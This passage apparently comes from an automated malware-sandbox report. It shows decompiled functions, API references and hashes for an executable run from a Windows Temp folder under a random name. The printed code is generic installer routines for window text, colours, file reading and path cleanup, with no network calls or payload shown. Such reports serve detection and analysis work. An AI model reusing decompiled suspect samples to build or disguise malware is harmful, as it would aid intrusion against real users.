                                  • GetSystemDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,00000400), ref: 0040665F
                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,00000400,00000000,004226E8,?,004055A0,004226E8,00000000,00000000,00418EC0,00000000), ref: 00406672
                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,00000000,004226E8,?,004055A0,004226E8,00000000), ref: 00406743
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: Directory$SystemWindowslstrcatlstrlen
                                  • String ID: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                  • API String ID: 4260037668-2673095502
                                  • Opcode ID: c443ed2fe3bb0bf6a7f47d91466dd90616c2d01c1c672cece4f8c154340eecc2
                                  • Instruction ID: a0e829acba6452fa9eccf544198c9fcc7de98ae724d9d0e98a153b46e40356ac
                                  • Opcode Fuzzy Hash: c443ed2fe3bb0bf6a7f47d91466dd90616c2d01c1c672cece4f8c154340eecc2
                                  • Instruction Fuzzy Hash: 5261E371A00215ABDB209F64DC40AAE37A5EF44318F11813AE957B72D0D77E8AA1CB5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405569 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00405569(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x429204;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a2d4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E00406544(_t38, 0, 0x4226e8, 0x4226e8, _a4);
					}
					_t27 = lstrlenW(0x4226e8);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x4291e8, 0x4226e8);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x4226e8;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x4226e8[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x4226e8, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                                  0x0040556f
                                  0x00405579
                                  0x0040557e
                                  0x00405584
                                  0x0040558f
                                  0x00405592
                                  0x00405595
                                  0x0040559b
                                  0x0040559b
                                  0x004055a1
                                  0x004055a9
                                  0x004055ac
                                  0x004055c9
                                  0x004055cd
                                  0x004055d6
                                  0x004055d6
                                  0x004055e0
                                  0x004055e9
                                  0x004055f5
                                  0x004055fc
                                  0x00405600
                                  0x00405603
                                  0x00405616
                                  0x00405624
                                  0x00405624
                                  0x00405628
                                  0x0040562a
                                  0x0040562d
                                  0x00000000
                                  0x0040562d
                                  0x004055ae
                                  0x004055b6
                                  0x004055be
                                  0x004055c4
                                  0x00000000
                                  0x004055c4
                                  0x004055be
                                  0x004055ac
                                  0x00405639

                                  APIs
                                  • lstrlenW.KERNEL32(004226E8,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                                  • lstrlenW.KERNEL32(004033ED,004226E8,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                                  • lstrcatW.KERNEL32(004226E8,004033ED), ref: 004055C4
                                  • SetWindowTextW.USER32(004226E8,004226E8), ref: 004055D6
                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                                    • Part of subcall function 00406544: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                                    • Part of subcall function 00406544: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,00000000,004226E8,?,004055A0,004226E8,00000000), ref: 00406743
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                  • String ID: &B
                                  • API String ID: 1495540970-3208460036
                                  • Opcode ID: cd3d78f21fdbe6d171f1bc4f822c20816f526bae1c4251478e7d40ba4a5f3583
                                  • Instruction ID: ee6600945c56622aa7300660faa8e28c1de3552a97c3cc7a142cd67d2e53ceba
                                  • Opcode Fuzzy Hash: cd3d78f21fdbe6d171f1bc4f822c20816f526bae1c4251478e7d40ba4a5f3583
                                  • Instruction Fuzzy Hash: 7021AC71900518BACF219F96DD84ACFBFB9EF45354F50807AF904B62A0C7798A51CFA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004044CA Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004044CA(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                  0x004044dc
                                  0x00404592
                                  0x00000000
                                  0x00404592
                                  0x004044ed
                                  0x004044f1
                                  0x00000000
                                  0x0040450b
                                  0x0040450b
                                  0x00404514
                                  0x00000000
                                  0x00000000
                                  0x00404516
                                  0x00404522
                                  0x00404525
                                  0x00404525
                                  0x0040452b
                                  0x00404531
                                  0x00404531
                                  0x0040453d
                                  0x00404543
                                  0x0040454a
                                  0x0040454d
                                  0x00404550
                                  0x00404552
                                  0x00404552
                                  0x0040455a
                                  0x00404560
                                  0x00404560
                                  0x0040456a
                                  0x0040456f
                                  0x00404572
                                  0x00404577
                                  0x0040457a
                                  0x0040457a
                                  0x0040458a
                                  0x0040458a
                                  0x00000000
                                  0x0040458d

                                  APIs
                                  • GetWindowLongW.USER32(?,000000EB), ref: 004044E7
                                  • GetSysColor.USER32(00000000), ref: 00404525
                                  • SetTextColor.GDI32(?,00000000), ref: 00404531
                                  • SetBkMode.GDI32(?,?), ref: 0040453D
                                  • GetSysColor.USER32(?), ref: 00404550
                                  • SetBkColor.GDI32(?,?), ref: 00404560
                                  • DeleteObject.GDI32(?), ref: 0040457A
                                  • CreateBrushIndirect.GDI32(?), ref: 00404584
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                  • String ID:
                                  • API String ID: 2320649405-0
                                  • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                  • Instruction ID: 38e33b6b7dbb33234eb72a45dbf2bae34717d2ad5d3f2d744b20a042554d00e7
                                  • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                  • Instruction Fuzzy Hash: 072133B1500704BBCB319F68DD08B5BBBF8AF45714F04896EEB96A26E1D734E904CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 87%
                                  			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2a8 =  *0x42a2a8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E00406467(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E004060D8( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E0040607A( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E0040644E( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                                  0x004026ec
                                  0x004026ee
                                  0x004026f1
                                  0x004026f3
                                  0x004026f6
                                  0x004026fb
                                  0x004026ff
                                  0x00402702
                                  0x00402705
                                  0x00402c2a
                                  0x00402c2d
                                  0x0040270b
                                  0x0040270b
                                  0x00402712
                                  0x00402714
                                  0x00402714
                                  0x0040271a
                                  0x0040287e
                                  0x0040287e
                                  0x00402881
                                  0x00402886
                                  0x004015b6
                                  0x0040292e
                                  0x0040292e
                                  0x00000000
                                  0x00402720
                                  0x00402721
                                  0x0040272c
                                  0x0040272f
                                  0x0040273b
                                  0x0040273f
                                  0x004027d7
                                  0x004027ef
                                  0x004027ff
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00402745
                                  0x00402745
                                  0x00402748
                                  0x00402749
                                  0x0040274c
                                  0x00402751
                                  0x00402758
                                  0x00402760
                                  0x00000000
                                  0x00402766
                                  0x00402766
                                  0x0040276b
                                  0x00000000
                                  0x00402771
                                  0x00402771
                                  0x00402779
                                  0x0040277c
                                  0x0040277f
                                  0x0040283a
                                  0x00402841
                                  0x00402785
                                  0x0040278b
                                  0x00402797
                                  0x00402801
                                  0x00402801
                                  0x00402799
                                  0x00402799
                                  0x0040279c
                                  0x0040279e
                                  0x0040279e
                                  0x0040279e
                                  0x004027a1
                                  0x004027a6
                                  0x004027a9
                                  0x00000000
                                  0x00000000
                                  0x004027ab
                                  0x004027ae
                                  0x004027bc
                                  0x004027c2
                                  0x004027d0
                                  0x00000000
                                  0x004027d2
                                  0x00000000
                                  0x004027d2
                                  0x00000000
                                  0x004027d0
                                  0x0040279e
                                  0x00402804
                                  0x00402807
                                  0x00000000
                                  0x00402809
                                  0x0040280e
                                  0x0040284f
                                  0x00402871
                                  0x00402878
                                  0x0040285d
                                  0x0040285d
                                  0x00402860
                                  0x00402863
                                  0x00402866
                                  0x00402866
                                  0x00000000
                                  0x00402817
                                  0x00402817
                                  0x0040281a
                                  0x0040281d
                                  0x00402823
                                  0x00402827
                                  0x0040282a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040282a
                                  0x0040280e
                                  0x00402807
                                  0x0040277f
                                  0x0040276b
                                  0x00402760
                                  0x00000000
                                  0x0040282c
                                  0x0040282c
                                  0x0040282f
                                  0x00402838
                                  0x00000000
                                  0x0040272f
                                  0x0040271a
                                  0x00402c33
                                  0x00402c39

                                  APIs
                                  • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                    • Part of subcall function 004060D8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 004060EE
                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                  • String ID: 9
                                  • API String ID: 163830602-2366072709
                                  • Opcode ID: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
                                  • Instruction ID: 3c27e7501abded1006c2f30e54a373b5f9dac3b1129e645fb880415469f2e5e7
                                  • Opcode Fuzzy Hash: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
                                  • Instruction Fuzzy Hash: 2351FA75D00219AADF20DF95CA89AAEBB79FF04304F10817BE541B62D0D7B49D82CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040678E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 91%
                                  			E0040678E(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405E4D(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405E03(L"*?|<>/\":", _t5))) == 0) {
							E00405FB2(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                  0x00406790
                                  0x00406799
                                  0x004067b0
                                  0x004067b0
                                  0x004067b7
                                  0x004067c3
                                  0x004067c3
                                  0x004067c6
                                  0x004067c9
                                  0x004067ce
                                  0x004067d0
                                  0x004067d9
                                  0x004067dd
                                  0x004067fa
                                  0x00406802
                                  0x00406802
                                  0x00406807
                                  0x00406809
                                  0x0040680c
                                  0x00406811
                                  0x00406812
                                  0x00406816
                                  0x00406816
                                  0x00406817
                                  0x0040681e
                                  0x00406820
                                  0x00406827
                                  0x00000000
                                  0x00000000
                                  0x0040682f
                                  0x00406835
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406835
                                  0x0040683a

                                  APIs
                                  • CharNextW.USER32(?,*?|<>/":,00000000,00000000,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 004067F1
                                  • CharNextW.USER32(?,?,?,00000000,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406800
                                  • CharNextW.USER32(?,00000000,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406805
                                  • CharPrevW.USER32(?,?,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406818
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: Char$Next$Prev
                                  • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 589700163-2982765560
                                  • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                  • Instruction ID: 0f69a0116b7f1ba106e871a719c63b07a343e19011b313dcb24ddb0bfcf4baff
                                  • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                  • Instruction Fuzzy Hash: CE11862A80161299D7303B149D40A7762FCEF98764F56843FE986732C0E77C4CD286BD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404E1E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00404E1E(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                  0x00404e2c
                                  0x00404e39
                                  0x00404e3f
                                  0x00404e7d
                                  0x00404e7d
                                  0x00404e8c
                                  0x00404e93
                                  0x00000000
                                  0x00404e95
                                  0x00404e41
                                  0x00404e50
                                  0x00404e58
                                  0x00404e5b
                                  0x00404e6d
                                  0x00404e73
                                  0x00404e7a
                                  0x00000000
                                  0x00404e7a
                                  0x00000000

                                  APIs
                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E39
                                  • GetMessagePos.USER32 ref: 00404E41
                                  • ScreenToClient.USER32 ref: 00404E5B
                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E6D
                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404E93
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
